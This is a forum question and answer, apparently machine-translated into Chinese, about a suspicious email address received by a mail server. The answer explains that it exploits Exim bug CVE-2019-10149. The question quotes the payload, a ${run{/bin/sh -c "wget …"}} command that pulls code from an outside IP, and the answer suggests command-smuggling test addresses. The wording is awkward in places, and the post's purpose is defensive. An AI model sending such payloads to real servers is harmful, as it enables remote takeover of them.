我經營自己的郵件伺服器,有時,人們會向 root 帳戶發送垃圾郵件或神秘的內容。最近,我收到一封空郵件,地址為:
根+${運行{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@mydomain.tld
該字串中的第二個 IP 位址似乎屬於我租用伺服器的相同託管服務。這跑步和獲取我覺得很可疑,但我在網路上沒有發現任何有關此類攻擊的資訊。
根據伺服器的郵件日誌,該郵件是從148.72.206.111發送的。但是,那從字段設定為[電子郵件受保護]。
有誰知道,這意味著什麼?
答案1
這是試圖利用 Exim4 SMTP 伺服器(v4.87 至 v4.91)中最近發現的錯誤,該錯誤將允許遠端命令執行,因為 Exim 會${variable}在某些實際上不應該的地方擴展替換。 (此語法廣泛用於主 Exim 設定檔中。)
該錯誤被稱為CVE-2019-10149(它還沒有商標名稱或標誌)。如果您使用發行版中的 Exim4,則您已經收到了補丁。由於您使用的是 Postfix,因此它一開始就不會影響您。
(也就是說,即使在 Postfix 中, 後面的參數也+經常用作命令列的一部分,例如在調用 Procmail 時。我可能會建議對您自己的伺服器進行一些測試,看看它如何處理類似someuser+$(blah)@或 之類的事情someuser+`blah`@。